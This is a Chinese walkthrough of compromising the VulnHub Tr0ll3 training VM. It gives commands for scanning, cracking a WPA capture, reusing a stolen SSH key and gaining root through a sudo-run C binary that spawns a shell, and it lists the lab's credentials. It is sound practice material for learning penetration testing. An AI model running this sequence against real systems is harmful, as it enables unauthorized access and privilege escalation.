本周实践的是vulnhub的Tr0ll3镜像,
下载地址,https://download.vulnhub.com/tr0ll/Tr0ll3.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址是192.168.0.195,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.195,
发现靶机只有22端口的ssh服务,
从cosole上获取到ssh登录的用户名密码,start/here,
登录,ssh [email protected],
查找全部权限的文件,find / -type f -perm 0777 2>/dev/null,
获取到wytshadow.cap和gold_star.txt,
把两个文件scp到kali攻击机,并进行破解,
aircrack-ng -w gold_star.txt wytshadow.cap,
获取到用户名密码,wytshadow/gaUoCe34t1,
切换用户,并查看sudo权限的程序,sudo -l,获取到nginx,
查看nginx的配置文件,发现useragent程序Lynx,
启动服务,sudo /usr/sbin/service nginx start,
查看端口,netstat -antp,
在kali攻击机上安装软件,sudo apt install lynx,
访问服务,lynx http://192.168.0.195:8080,
获取到用户名密码,genphlux/HF9nd0cR!,
继续切用户,进入genphlux用户目录下,
发现了maleus用户的私钥文件,
拷贝到kali攻击机,修改权限,chmod 600 key,
登录,ssh [email protected] -i key,
查看到一个隐藏文件里有密码,B^slc8I$,
继续查看sudo权限的程序,sudo -l,
发现dont_even_bother是root权限执行的,
创建c文件,重新编译可执行文件,
vim dont_even_bother.c,
int main (void){
setresuid(0, 0, 0);
system("/bin/sh");
}
gcc dont_even_bother.c -o dont_even_bother,
执行新的可执行文件,sudo /home/maleus/dont_even_bother,
获取到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Tr0ll3的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论